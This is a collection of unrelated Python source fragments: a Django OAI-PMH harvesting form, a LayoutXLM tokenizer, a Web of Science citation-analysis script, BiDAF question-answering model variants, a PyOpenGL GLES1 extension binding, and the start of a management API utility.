    # Python keyword and a builtin, respectively.
    from_ = forms.CharField(label=u"From",
                help_text=u"Lower bound for datestamp-based selective " \
                    "harvesting. e.g '2011-02-01T12:00:00Z' or '2011-02-01'",
                required=False,)
    until = forms.CharField(label=u"Until",
                help_text=u"Upper bound for datestamp-based selective " \
                    "harvesting. e.g '2011-02-01T12:00:00Z' or '2011-02-01'",
                required=False,)
    set_ = forms.CharField(label=u"Set",
                help_text=u"Select a set name to specify set criteria " \
                    "for selective harvesting",
                required=False,)
    resumptionToken = forms.CharField(label=u"Resumption Token",
                help_text=u"Exclusive argument. " \
                    "It is a token returned by a previous request "\
                    "that issued an incomplete list.",
                required=False,)
# coding=utf-8
from transformers import XLMRobertaTokenizer
from transformers.utils import logging
logger = logging.get_logger(__name__)
# SentencePiece's word-boundary marker character.
SPIECE_UNDERLINE = "▁"
VOCAB_FILES_NAMES = {"vocab_file": "sentencepiece.bpe.model"}
# Hub locations of the pretrained SentencePiece vocabularies.
PRETRAINED_VOCAB_FILES_MAP = {
    "vocab_file": {
        "layoutxlm-base": "https://huggingface.co/layoutxlm-base/resolve/main/sentencepiece.bpe.model",
        "layoutxlm-large": "https://huggingface.co/layoutxlm-large/resolve/main/sentencepiece.bpe.model",
    }
}
# Maximum sequence lengths supported by each pretrained checkpoint.
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
    "layoutxlm-base": 512,
    "layoutxlm-large": 512,
}
class LayoutXLMTokenizer(XLMRobertaTokenizer):
    """Tokenizer for LayoutXLM: identical to XLMRobertaTokenizer except for
    the pretrained-file maps above and a default model_max_length of 512."""
    vocab_files_names = VOCAB_FILES_NAMES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
    model_input_names = ["input_ids", "attention_mask"]
    def __init__(self, model_max_length=512, **kwargs):
        # Only overrides the default model_max_length; all other behavior
        # is inherited from XLMRobertaTokenizer.
        super().__init__(model_max_length=model_max_length, **kwargs)
|
#coding:utf-8
'''
Split WOS papers into research fields according to their subject labels.
'''
from basic_config import *
from gini import gini
'''
Select six top fields, and within each of them one sub-field, as the
experimental dataset.
'''
def get_paperids_of_subjects():
    """Bucket WOS paper ids into six broad subjects and count papers per year.

    Reads pid->subjects and pid->year JSON maps and assigns a paper to every
    field whose name appears as a substring of one of its subject labels.
    Writes data/subj_pids.json and data/subj_paper_num.json.

    NOTE(review): substring matching may over-match (e.g. 'art' also occurs
    inside words like 'earth') — confirm this is acceptable.
    """
    pid_subjs = json.loads(open('../cascade_temporal_analysis/data/_ids_subjects.json').read())
    paper_year = json.loads(open('../cascade_temporal_analysis/data/pubyear_ALL.json').read())
    subj_ids = defaultdict(list)
    subj_year_num = defaultdict(lambda:defaultdict(int))
    # pid_topsubj = json.loads(open('../cascade_temporal_analysis/data/_ids_top_subjects.json').read())
    sub_foses = set(['computer science','physics','chemistry','medicine','art','biology'])
    for pid in pid_subjs.keys():
        for subj in pid_subjs[pid]:
            for s in sub_foses:
                if s in subj.lower():
                    subj_ids[s].append(pid)
                    subj_year_num[s][paper_year[pid]]+=1
    open('data/subj_pids.json','w').write(json.dumps(subj_ids))
    logging.info('data saved to data/subj_pids.json')
    open('data/subj_paper_num.json','w').write(json.dumps(subj_year_num))
    logging.info('data saved to data/subj_paper_num.json')
    for subj in subj_ids.keys():
        logging.info('there are {} papers in subj {}'.format(len(subj_ids[subj]),subj))
def stats_citation_dis_over_years():
    """Accumulate per-field, per-year citation counts for every paper.

    For each citation edge (cited pid -> citing id) and each year in
    1900-2018, counts the edge toward a paper's total if both papers were
    published by that year and share the same field.  Done both at the
    top-subject level and for the six selected sub-fields.  Writes
    data/topsubj_year_pid_citnum.json and data/subj_year_pid_citnum.json.
    """
    sub_foses = set(['computer science','physics','chemistry','medicine','art','biology'])
    # pid_subjs = json.loads(open('../cascade_temporal_analysis/data/_ids_subjects.json').read())
    pid_topsubjs = json.loads(open('../cascade_temporal_analysis/data/_ids_top_subjects.json').read())
    paper_year = json.loads(open('../cascade_temporal_analysis/data/pubyear_ALL.json').read())
    subj_pids = json.loads(open('data/subj_pids.json').read())
    # Invert subj -> pids into pid -> set of subjects for fast lookup.
    pid_subjs = defaultdict(set)
    for subj in subj_pids.keys():
        for pid in subj_pids[subj]:
            pid_subjs[pid].add(subj)
    years = range(1900,2019)
    topsubj_year_pid_citnum = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
    subj_year_pid_citnum = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
    progress = 0
    # One citation edge per line: "<cited pid>\t<citing pid>".
    for line in open('../cascade_temporal_analysis/data/pid_cits_ALL.txt'):
        progress+=1
        if progress%10000000==0:
            logging.info('reading %d citation relations....' % progress)
        line = line.strip()
        pid,citing_id = line.split("\t")
        # Skip edges where either side lacks a publication year or subject.
        if paper_year.get(pid,None) is None or paper_year.get(citing_id,None) is None:
            continue
        if pid_topsubjs.get(pid,None) is None or pid_topsubjs.get(citing_id,None) is None:
            continue
        citing_year = int(paper_year[citing_id])
        cited_year = int(paper_year[pid])
        for year in years:
            ## top-level subjects
            for topsubj in pid_topsubjs[pid]:
                ## citing and cited papers must belong to the same field
                if topsubj not in set(pid_topsubjs[citing_id]):
                    continue
                if citing_year<=year and cited_year<=year:
                    # count citation links where both papers exist by `year`
                    topsubj_year_pid_citnum[topsubj][year][pid]+=1
            ## one selected sub-field per top field
            for subj in pid_subjs[pid]:
                if subj.lower() not in set(pid_subjs[citing_id]):
                    continue
                if citing_year<=year and cited_year<=year:
                    # count citation links where both papers exist by `year`
                    subj_year_pid_citnum[subj][year][pid]+=1
    open('data/topsubj_year_pid_citnum.json','w').write(json.dumps(topsubj_year_pid_citnum))
    logging.info('data saved to data/topsubj_year_pid_citnum.json.')
    open('data/subj_year_pid_citnum.json','w').write(json.dumps(subj_year_pid_citnum))
    logging.info('data saved to data/subj_year_pid_citnum.json.')
## Track how the citation count of all WOS papers evolves over time.
def stats_citation_count_of_papers(subj,tag):
    """Count per-year citations within one sub-field.

    Only 'local' citations count: both the cited and the citing paper must
    belong to `subj` (as listed in data/subj_pids.json).  Writes
    data/pid_year_citnum_<tag>.json mapping pid -> citing-year -> count.
    """
    logging.info('loading paper year obj ...')
    paper_year = json.loads(open('../cascade_temporal_analysis/data/pubyear_ALL.json').read())
    logging.info('start to stat citation relations ...')
    subj_pids = json.loads(open('data/subj_pids.json').read())
    ## only local (within-field) citations are counted
    # _ids_top_subjects = json.loads(open(''))
    id_set = set(subj_pids[subj])
    pid_year_citnum = defaultdict(lambda:defaultdict(int))
    progress = 0
    # Fix: removed the unused `lines = []` local.
    for line in open('../cascade_temporal_analysis/data/pid_cits_ALL.txt'):
        progress+=1
        if progress%10000000==0:
            logging.info('reading %d citation relations....' % progress)
        line = line.strip()
        pid,citing_id = line.split("\t")
        if pid not in id_set:
            continue
        if citing_id not in id_set:
            continue
        if paper_year.get(pid,None) is None or paper_year.get(citing_id,None) is None:
            continue
        pid_year_citnum[pid][int(paper_year[citing_id])]+=1
    open('data/pid_year_citnum_{}.json'.format(tag),'w').write(json.dumps(pid_year_citnum))
    logging.info('pid year citnum saved to data/pid_year_citnum_{}.json.'.format(tag))
## How the mean citation count of highly cited papers varies with dataset size.
def general_top_citation_trend_over_datasize(subj,tag):
    """Build yearly citation-count distributions for one sub-field.

    Produces three groupings of {citation count -> number of papers}:
    overall per year, per publication year, and per team size.  Writes
    data/year_citnum_dis_<tag>.json, data/puby_year_citnum_dis_<tag>.json
    and data/ts_year_citnum_dis_<tag>.json.

    NOTE(review): the `subj` argument is unused here; relies on
    paper_year_total_citnum() defined elsewhere in this module.
    """
    ## paper year
    paper_year = json.loads(open('../cascade_temporal_analysis/data/pubyear_ALL.json').read())
    paper_ts = json.loads(open('data/pid_teamsize.json').read())
    ## analyse by sub-field
    pid_year_citnum = json.loads(open('data/pid_year_citnum_{}.json'.format(tag)).read())
    ## citation-count distribution per year
    year_citnum_dis = defaultdict(lambda:defaultdict(int))
    ## citation-count distribution grouped by publication year
    puby_year_citnum_dis = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
    ## citation-count distribution per team size over time
    ts_year_citnum_dis = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
    for pid in pid_year_citnum.keys():
        pubyear = int(paper_year[pid])
        if pubyear>= 2016:
            continue
        ts = paper_ts.get(pid,1)
        year_total = paper_year_total_citnum(pid_year_citnum[pid])
        for year in range(pubyear,2016):
            citN = year_total.get(year,0)
            if citN==0:
                continue
            year_citnum_dis[year][citN]+=1
            puby_year_citnum_dis[pubyear][year][citN]+=1
            ts_year_citnum_dis[ts][year][citN]+=1
    open('data/year_citnum_dis_{}.json'.format(tag),'w').write(json.dumps(year_citnum_dis))
    logging.info('subject year paper citnum dis data saved to data/year_citnum_dis_{}.json'.format(tag))
    open('data/puby_year_citnum_dis_{}.json'.format(tag),'w').write(json.dumps(puby_year_citnum_dis))
    logging.info('subject pubyear year paper citnum dis data saved to data/puby_year_citnum_dis_{}.json'.format(tag))
    open('data/ts_year_citnum_dis_{}.json'.format(tag),'w').write(json.dumps(ts_year_citnum_dis))
    logging.info('subject teamsize year paper citnum dis data saved to data/ts_year_citnum_dis_{}.json'.format(tag))
    logging.info('done')
## Mean citation count of highly cited papers from different eras vs dataset size.
def temporal_top_citation_trend_over_datasize(subj,tag):
    """Mostly disabled scaffolding; currently only delegates.

    NOTE(review): `subj`/`tag` are unused and subj_upper_limit_over_year()
    is not defined in this file (upper_limit_over_year below takes
    arguments) — confirm the intended call.
    """
    # paper_num_dis_over_pubyear()
    subj_upper_limit_over_year()
    # fig,axes = plt.subplots(4,2,figsize=(10,16))
    # for i,subj in enumerate(sorted(year_citnum_dis.keys())):
    # plt.tight_layout()
    # plt.savefig('fig/subj_citation_upper_limit.png',dpi=400)
    # logging.info('fig saved to fig/subj_citation_upper_limit.png.')
    # year_num = subj_year_num[subj]
## Citation-count distribution per subject and per year.
def upper_limit_over_year(subj,tag):
    """Plot the 'citation upper limit' (mean of the top 10/100/1000 most
    cited papers) against cumulative dataset size for one sub-field, on
    log-log axes with log fits; saves the figure under fig/.
    """
    logging.info('loading subj year citnum dis ...')
    year_citnum_dis = json.loads(open('data/year_citnum_dis_{}.json'.format(tag)).read())
    year_num = json.loads(open('data/subj_paper_num.json').read())[subj]
    fig,ax = plt.subplots(figsize=(5,4))
    # year_citnum_dis = year_citnum_dis[subj]
    xs = []
    ys_10 = []
    ys_100 = []
    ys_1000 = []
    num_t = 0
    for year in sorted(year_citnum_dis.keys(),key=lambda x:int(x)):
        # xs.append(int(year))
        # x axis: cumulative number of papers up to this year.
        num_t+=year_num[year]
        xs.append(num_t)
        citnum_dis = year_citnum_dis[year]
        top10 = topN_mean(citnum_dis,10)
        top100 = topN_mean(citnum_dis,100)
        top1000 = topN_mean(citnum_dis,1000)
        ys_10.append(top10)
        ys_100.append(top100)
        ys_1000.append(top1000)
    curve_fit_plotting(ax,xs,ys_10,'top10')
    curve_fit_plotting(ax,xs,ys_100,'top100')
    curve_fit_plotting(ax,xs,ys_1000,'top1000')
    ax.set_title(subj)
    ax.set_xlabel('dataset size')
    ax.set_ylabel('citation upper limit')
    ax.set_xscale('log')
    ax.set_yscale('log')
    ax.legend()
    plt.tight_layout()
    plt.savefig('fig/subj_citation_upper_limit_{}.png'.format(tag),dpi=400)
    logging.info('fig saved to fig/subj_citation_upper_limit_{}.png.'.format(tag))
def curve_fit_plotting(ax,xs,ys,label):
    """Plot (xs, ys) on *ax* and overlay a fitted logarithmic trend line.

    Leading points are dropped until the dataset size exceeds 10000 (all
    points are kept when none does).  The fitted model a*log(x)+b is drawn
    dash-dotted in the same color as the data line.
    """
    # Filter out the small-dataset prefix.
    cut = next((i for i, size in enumerate(xs) if size > 10000), 0)
    xs, ys = xs[cut:], ys[cut:]

    data_line, = ax.plot(xs, ys, label=label)
    color = data_line.get_color()

    def log_model(x, a, b):
        # Logarithmic growth model fitted to the trend.
        return a * np.log(x) + b

    (a_hat, b_hat), _ = curve_fit(log_model, xs, ys)
    ax.plot(xs, [log_model(x, a_hat, b_hat) for x in xs], '-.', c=color)
## Mean citation count of the N most-cited papers.
def topN_mean(citnum_dis,N):
    """Return the mean citation count over the top *N* papers.

    Args:
        citnum_dis: mapping of citation count -> number of papers with that
            count; keys may be strings (as produced by json.loads).
        N: number of top papers to average; when fewer than N papers exist,
            all of them are averaged.

    Returns:
        numpy floating mean of the N largest citation counts.
    """
    import heapq  # local import: file-level import block is not guaranteed to have it
    cits = []
    for key, num in citnum_dis.items():
        # Expand the histogram into one entry per paper.
        cits.extend([int(key)] * num)
    # heapq.nlargest avoids sorting the whole list just to take the top N,
    # and the previous key=lambda x: int(x) was redundant (cits holds ints).
    topN = heapq.nlargest(N, cits)
    return np.mean(topN)
def paper_num_dis_over_pubyear():
    ## Cumulative number of papers per subject as the publication year advances.
    """Plot, per subject, the cumulative paper count over publication years."""
    logging.info('loading subj year paper num ...')
    subj_year_num = json.loads(open('data/subj_year_num.json').read())
    plt.figure(figsize = (6,4))
    for subj in sorted(subj_year_num.keys()):
        year_num = subj_year_num[subj]
        xs= []
        ys = []
        total = 0
        for year in sorted(year_num.keys(),key=lambda x:int(x)):
            xs.append(int(year))
            total+= int(year_num[year])
            # y is a running total, so each curve is cumulative.
            ys.append(total)
        plt.plot(xs,ys,label="{}".format(subj))
    plt.xlabel('publication year')
    plt.ylabel('total number of papers')
    plt.yscale('log')
    # Legend placed below the axes; passed to savefig as an extra artist so
    # it is not clipped.
    lgd = plt.legend(loc=6,bbox_to_anchor=(0.5, -0.2), ncol=2)
    # plt.legend()
    plt.tight_layout()
    plt.savefig('fig/subj_year_num_dis.png',dpi=400,additional_artists=[lgd],bbox_inches="tight")
    logging.info('paper year num dis saved to fig/subj_year_num_dis.png')
def paper_year_total_citnum(year_citnum):
    """Cumulate a paper's per-year citation counts.

    Args:
        year_citnum: mapping of year (string keys) -> citations received in
            that year.

    Returns:
        dict mapping each year (int) to the running total of citations up to
        and including that year.  Short histories are padded through 2017 so
        every paper spans a comparable window; otherwise the series stops
        just before the last cited year (matching the original semantics).
    """
    years = [int(y) for y in year_citnum]
    first, last = min(years), max(years)
    end = 2018 if last + 1 < 2018 else last
    running = 0
    cumulative = {}
    for year in range(first, end):
        running += year_citnum.get(str(year), 0)
        cumulative[year] = running
    return cumulative
if __name__ == '__main__':
    ## Paper ids of the subject areas under study.
    # get_paperids_of_subjects()
    # subjs = ['computer science','physics','chemistry','medicine','art','biology']
    # tags = ['cs','physics','chemistry','medicine','art','biology']
    # for i in range(len(subjs)):
    #     subj = subjs[i]
    #     tag = tags[i]
    #     ## Track how the citation counts of papers change over time.
    #     stats_citation_count_of_papers(subj,tag)
    #     general_top_citation_trend_over_datasize(subj,tag)
    #     upper_limit_over_year(subj,tag)
    ## subj pubyear teamsize over datasize
    #
    # temporal_top_citation_trend_over_datasize()
    # NOTE(review): presumably defined earlier in this file; builds the
    # citation-distribution datasets consumed by the plotting helpers above.
    stats_citation_dis_over_years()
|
"""Top-level model classes.
Author:
Chris Chute (chute@stanford.edu)
"""
import layers , bert_layers
import torch
import torch.nn as nn
import torch.nn.functional as F
class BiDAF(nn.Module):
    """Baseline BiDAF model for SQuAD.

    Implements "Bidirectional Attention Flow for Machine Comprehension"
    (Seo et al., https://arxiv.org/abs/1611.01603) with the usual SQuAD
    pipeline: embed word indices, encode with an RNN, apply bidirectional
    attention, re-encode, and produce start/end span scores.

    Args:
        word_vectors (torch.Tensor): Pre-trained word vectors.
        hidden_size (int): Number of features in the hidden state at each layer.
        drop_prob (float): Dropout probability.
    """

    def __init__(self, word_vectors, hidden_size, drop_prob=0.):
        super(BiDAF, self).__init__()
        self.emb = layers.Embedding(word_vectors=word_vectors,
                                    hidden_size=hidden_size,
                                    drop_prob=drop_prob)
        self.enc = layers.RNNEncoder(input_size=hidden_size,
                                     hidden_size=hidden_size,
                                     num_layers=1,
                                     drop_prob=drop_prob)
        self.att = layers.BiDAFAttention(hidden_size=2 * hidden_size,
                                         drop_prob=drop_prob)
        self.mod = layers.RNNEncoder(input_size=8 * hidden_size,
                                     hidden_size=hidden_size,
                                     num_layers=2,
                                     drop_prob=drop_prob)
        self.out = layers.BiDAFOutput(hidden_size=hidden_size,
                                      drop_prob=drop_prob)

    def forward(self, cw_idxs, qw_idxs):
        # Non-zero indices are real tokens; index 0 is padding.
        c_mask = cw_idxs != 0
        q_mask = qw_idxs != 0
        c_len = c_mask.sum(-1)
        q_len = q_mask.sum(-1)

        # Embed and encode context and question.
        c_enc = self.enc(self.emb(cw_idxs), c_len)    # (batch, c_len, 2h)
        q_enc = self.enc(self.emb(qw_idxs), q_len)    # (batch, q_len, 2h)

        # Bidirectional attention, modeling layer, span prediction.
        att = self.att(c_enc, q_enc, c_mask, q_mask)  # (batch, c_len, 8h)
        mod = self.mod(att, c_len)                    # (batch, c_len, 2h)
        return self.out(att, mod, c_mask)             # two (batch, c_len) tensors
class BiDAF_charCNN(nn.Module):
    """BiDAF model with an additional character-level CNN embedding.

    Word and character embeddings are concatenated and passed through a
    highway encoder before the standard BiDAF pipeline (RNN encoder,
    bidirectional attention, modeling layer, output layer).  Based on
    "Bidirectional Attention Flow for Machine Comprehension"
    (https://arxiv.org/abs/1611.01603).

    Args:
        word_vectors (torch.Tensor): Pre-trained word vectors.
        char_vectors (torch.Tensor): Pre-trained character vectors.
        hidden_size (int): Number of features in the hidden state at each layer.
        drop_prob (float): Dropout probability.
    """
    def __init__(self, word_vectors, char_vectors, hidden_size, drop_prob=0.):
        super(BiDAF_charCNN, self).__init__()
        self.emb = layers.Embedding(word_vectors=word_vectors,
                                    hidden_size=hidden_size,
                                    drop_prob=drop_prob)
        self.char_emb = layers.CharEmbedding(char_vectors=char_vectors,
                                             hidden_size=hidden_size,
                                             drop_prob=drop_prob)
        # Word + char embeddings are concatenated, so downstream widths
        # are doubled relative to the baseline BiDAF.
        self.hwy = layers.HighwayEncoder(2, 2*hidden_size)
        self.enc = layers.RNNEncoder(input_size=2*hidden_size,
                                     hidden_size=2*hidden_size,
                                     num_layers=1,
                                     drop_prob=drop_prob)
        self.att = layers.BiDAFAttention(hidden_size=2 * 2*hidden_size,
                                         drop_prob=drop_prob)
        self.mod = layers.RNNEncoder(input_size=8 * 2*hidden_size,
                                     hidden_size=hidden_size,
                                     num_layers=2,
                                     drop_prob=drop_prob)
        self.out = layers.BiDAFOutput(hidden_size=hidden_size,
                                      drop_prob=drop_prob)
    def forward(self, cw_idxs, cc_idxs, qw_idxs, qc_idxs):
        # Non-zero word indices mark real tokens (index 0 is padding).
        c_mask = torch.zeros_like(cw_idxs) != cw_idxs
        q_mask = torch.zeros_like(qw_idxs) != qw_idxs
        c_len, q_len = c_mask.sum(-1), q_mask.sum(-1)
        c_emb_w = self.emb(cw_idxs)        # (batch_size, c_len, hidden_size)
        q_emb_w = self.emb(qw_idxs)        # (batch_size, q_len, hidden_size)
        c_emb_cc = self.char_emb(cc_idxs)  # (batch_size, c_len, hidden_size)
        q_emb_cc = self.char_emb(qc_idxs)  # (batch_size, q_len, hidden_size)
        # Fuse word and char embeddings through the highway network.
        c_emb = self.hwy(torch.cat([c_emb_w,c_emb_cc],axis=-1))
        q_emb = self.hwy(torch.cat([q_emb_w,q_emb_cc],axis=-1))
        c_enc = self.enc(c_emb, c_len)     # (batch_size, c_len, 2 * hidden_size)
        q_enc = self.enc(q_emb, q_len)     # (batch_size, q_len, 2 * hidden_size)
        att = self.att(c_enc, q_enc,
                       c_mask, q_mask)     # (batch_size, c_len, 8 * hidden_size)
        mod = self.mod(att, c_len)         # (batch_size, c_len, 2 * hidden_size)
        out = self.out(att, mod, c_mask)   # 2 tensors, each (batch_size, c_len)
        return out
class BiDAF_charCNN_BERTEnc(nn.Module):
    """BiDAF with character-CNN embeddings and a BERT-style encoder layer.

    Word and character embeddings are combined (channel-interleaved via
    ``twist`` when ``twist_embeddings`` is True, otherwise concatenated),
    passed through a highway network, and encoded with a transformer
    (BERT-style) encoder in place of the baseline RNN encoder.  Attention,
    modeling, and output layers follow the original BiDAF architecture
    (https://arxiv.org/abs/1611.01603).

    Args:
        word_vectors (torch.Tensor): Pre-trained word vectors.
        char_vectors (torch.Tensor): Pre-trained character vectors.
        hidden_size (int): Number of features in the hidden state at each layer.
        drop_prob (float): Dropout probability.
        twist_embeddings (bool): Interleave word/char embedding channels
            instead of plain concatenation.
    """
    def __init__(self, word_vectors, char_vectors, hidden_size, drop_prob=0.,twist_embeddings=True):
        super(BiDAF_charCNN_BERTEnc, self).__init__()
        ###
        self.twist_embeddings = twist_embeddings
        # Index pattern [0, h, 1, h+1, ...] used by twist() to interleave the
        # channels of two (batch, seq, h) tensors after concatenation.
        idx_list = []
        for i in range(hidden_size):
            idx_list.append(i)
            idx_list.append(hidden_size+i)
        # Buffer (not a parameter) so it follows the module across devices.
        self.register_buffer('idx_twist',torch.tensor(idx_list))
        ###
        self.emb = layers.Embedding(word_vectors=word_vectors,
                                    hidden_size=hidden_size,
                                    drop_prob=drop_prob)
        self.char_emb = layers.CharEmbedding(char_vectors=char_vectors,
                                             hidden_size=hidden_size,
                                             drop_prob=drop_prob)
        self.hwy = layers.HighwayEncoder(2, 2*hidden_size)
        # Transformer encoder replaces the baseline RNN encoder; commented
        # values are alternative hyperparameters tried during experiments.
        self.enc = bert_layers.BertEncoder(n_layers=6, #n_layers=3,
                                           d_feature=2*hidden_size,
                                           n_heads=8,
                                           out_size=2*hidden_size,
                                           d_ff=2048,
                                           #d_ff = 2*hidden_size,
                                           dropout_prob=0.1,
                                           #dropout_prob=drop_prob,
                                           ff_activation=F.relu)
        self.att = layers.BiDAFAttention(hidden_size=2 * hidden_size,
                                         drop_prob=drop_prob)
        self.mod = layers.RNNEncoder(input_size=8 * hidden_size,
                                     hidden_size=hidden_size,
                                     num_layers=2,
                                     drop_prob=drop_prob)
        self.out = layers.BiDAFOutput(hidden_size=hidden_size,
                                      drop_prob=drop_prob)
    def twist(self,a,b):
        # Interleave the last-dim channels of a and b: [a0, b0, a1, b1, ...].
        assert a.shape == b.shape , 'tensors to be twisted need to have the same size'
        idx = self.idx_twist.repeat(a.shape[0],a.shape[1],1)
        c = torch.cat([a,b],axis=-1)
        return torch.gather(c,-1,idx)
    def forward(self, cw_idxs, cc_idxs, qw_idxs, qc_idxs):
        # Non-zero word indices mark real tokens (index 0 is padding).
        c_mask = torch.zeros_like(cw_idxs) != cw_idxs
        q_mask = torch.zeros_like(qw_idxs) != qw_idxs
        c_len, q_len = c_mask.sum(-1), q_mask.sum(-1)
        c_emb_w = self.emb(cw_idxs)        # (batch_size, c_len, hidden_size)
        q_emb_w = self.emb(qw_idxs)        # (batch_size, q_len, hidden_size)
        c_emb_cc = self.char_emb(cc_idxs)  # (batch_size, c_len, hidden_size)
        q_emb_cc = self.char_emb(qc_idxs)  # (batch_size, q_len, hidden_size)
        if self.twist_embeddings:
            c_emb = self.hwy(self.twist(c_emb_w,c_emb_cc))
            q_emb = self.hwy(self.twist(q_emb_w,q_emb_cc))
        else:
            c_emb = self.hwy(torch.cat([c_emb_w,c_emb_cc],axis=-1))
            q_emb = self.hwy(torch.cat([q_emb_w,q_emb_cc],axis=-1))
        # The BERT-style encoder takes no length argument (unlike the RNN).
        c_enc = self.enc(c_emb)            # (batch_size, c_len, 2 * hidden_size)
        q_enc = self.enc(q_emb)            # (batch_size, q_len, 2 * hidden_size)
        att = self.att(c_enc, q_enc,c_mask, q_mask)  # (batch_size, c_len, 8 * hidden_size)
        mod = self.mod(att, c_len)         # (batch_size, c_len, 2 * hidden_size)
        out = self.out(att, mod, c_mask)   # 2 tensors, each (batch_size, c_len)
        return out
class BiDAF_charCNN_BERTEnc_BERTMod(nn.Module):
    """BiDAF variant with BERT-style encoders for BOTH the encoding and the
    modeling layers.

    Like :class:`BiDAF_charCNN_BERTEnc`, but the modeling layer is also a
    transformer (BERT-style) encoder instead of the baseline RNN; note the
    different default ``twist_embeddings=False`` here.  Based on
    "Bidirectional Attention Flow for Machine Comprehension"
    (https://arxiv.org/abs/1611.01603).

    Args:
        word_vectors (torch.Tensor): Pre-trained word vectors.
        char_vectors (torch.Tensor): Pre-trained character vectors.
        hidden_size (int): Number of features in the hidden state at each layer.
        drop_prob (float): Dropout probability.
        twist_embeddings (bool): Interleave word/char embedding channels
            instead of plain concatenation.
    """
    def __init__(self, word_vectors, char_vectors, hidden_size, drop_prob=0.,twist_embeddings=False):
        super(BiDAF_charCNN_BERTEnc_BERTMod, self).__init__()
        ###
        self.twist_embeddings = twist_embeddings
        # Index pattern [0, h, 1, h+1, ...] used by twist() to interleave the
        # channels of two (batch, seq, h) tensors after concatenation.
        idx_list = []
        for i in range(hidden_size):
            idx_list.append(i)
            idx_list.append(hidden_size+i)
        # Buffer (not a parameter) so it follows the module across devices.
        self.register_buffer('idx_twist',torch.tensor(idx_list))
        ###
        self.emb = layers.Embedding(word_vectors=word_vectors,
                                    hidden_size=hidden_size,
                                    drop_prob=drop_prob)
        self.char_emb = layers.CharEmbedding(char_vectors=char_vectors,
                                             hidden_size=hidden_size,
                                             drop_prob=drop_prob)
        self.hwy = layers.HighwayEncoder(2, 2*hidden_size)
        # Transformer encoder; commented values are alternative
        # hyperparameters tried during experiments.
        self.enc = bert_layers.BertEncoder(n_layers=3, #n_layers=4,
                                           d_feature=2*hidden_size,
                                           n_heads=8,
                                           out_size=2*hidden_size,
                                           #d_ff=2048,
                                           d_ff = 2*hidden_size,
                                           dropout_prob=0.1,
                                           #dropout_prob=drop_prob,
                                           ff_activation=F.relu)
        self.att = layers.BiDAFAttention(hidden_size=2 * hidden_size,
                                         drop_prob=drop_prob)
        # Modeling layer is also a transformer here (8h in, 2h out).
        self.mod = bert_layers.BertEncoder(n_layers=3, #n_layers=3,
                                           d_feature=8*hidden_size,
                                           n_heads=8,
                                           out_size=2*hidden_size,
                                           #d_ff=2048,
                                           d_ff = 2*hidden_size,
                                           dropout_prob=0.1,
                                           #dropout_prob=drop_prob,
                                           ff_activation=F.relu)
        # self.mod = layers.RNNEncoder(input_size=8 * hidden_size,
        #                              hidden_size=hidden_size,
        #                              num_layers=2,
        #                              drop_prob=drop_prob)
        self.out = layers.BiDAFOutput(hidden_size=hidden_size,
                                      drop_prob=drop_prob)
    def twist(self,a,b):
        # Interleave the last-dim channels of a and b: [a0, b0, a1, b1, ...].
        assert a.shape == b.shape , 'tensors to be twisted need to have the same size'
        idx = self.idx_twist.repeat(a.shape[0],a.shape[1],1)
        c = torch.cat([a,b],axis=-1)
        return torch.gather(c,-1,idx)
    def forward(self, cw_idxs, cc_idxs, qw_idxs, qc_idxs):
        # Non-zero word indices mark real tokens (index 0 is padding).
        c_mask = torch.zeros_like(cw_idxs) != cw_idxs
        q_mask = torch.zeros_like(qw_idxs) != qw_idxs
        c_len, q_len = c_mask.sum(-1), q_mask.sum(-1)
        c_emb_w = self.emb(cw_idxs)        # (batch_size, c_len, hidden_size)
        q_emb_w = self.emb(qw_idxs)        # (batch_size, q_len, hidden_size)
        c_emb_cc = self.char_emb(cc_idxs)  # (batch_size, c_len, hidden_size)
        q_emb_cc = self.char_emb(qc_idxs)  # (batch_size, q_len, hidden_size)
        if self.twist_embeddings:
            c_emb = self.hwy(self.twist(c_emb_w,c_emb_cc))
            q_emb = self.hwy(self.twist(q_emb_w,q_emb_cc))
        else:
            c_emb = self.hwy(torch.cat([c_emb_w,c_emb_cc],axis=-1))
            q_emb = self.hwy(torch.cat([q_emb_w,q_emb_cc],axis=-1))
        # BERT-style encoders take no length argument (unlike the RNN).
        c_enc = self.enc(c_emb)            # (batch_size, c_len, 2 * hidden_size)
        q_enc = self.enc(q_emb)            # (batch_size, q_len, 2 * hidden_size)
        att = self.att(c_enc, q_enc,c_mask, q_mask)  # (batch_size, c_len, 8 * hidden_size)
        mod = self.mod(att)                # (batch_size, c_len, 2 * hidden_size)
        out = self.out(att, mod, c_mask)   # 2 tensors, each (batch_size, c_len)
        return out
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES1 import _types as _cs
# End users want this...
from OpenGL.raw.GLES1._types import *
from OpenGL.raw.GLES1 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES1_IMG_texture_compression_pvrtc'
def _f( function ):
    # Wrap an extension entry point with the GLES1 platform dispatcher and
    # the standard error checker.
    return _p.createFunction( function,_p.PLATFORM.GLES1,'GLES1_IMG_texture_compression_pvrtc',error_checker=_errors._error_checker)
# Compressed texture format tokens defined by IMG_texture_compression_pvrtc.
GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG=_C('GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG',0x8C03)
GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG=_C('GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG',0x8C02)
GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG=_C('GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG',0x8C01)
GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG=_C('GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG',0x8C00)
|
import os
import json
import argparse
from management_api import ManagementAPIClient
from utils import read_yaml, should_use_external_idp
import base64
def yaml_obj_to_loc_object(obj):
    """Convert a {locale_code: text} mapping into the API's localized-object
    list format.

    Each entry becomes ``{"code": <locale>, "parts": [{"str": <text>}]}``,
    preserving the mapping's iteration order.
    """
    return [
        {"code": code, "parts": [{"str": text}]}
        for code, text in obj.items()
    ]
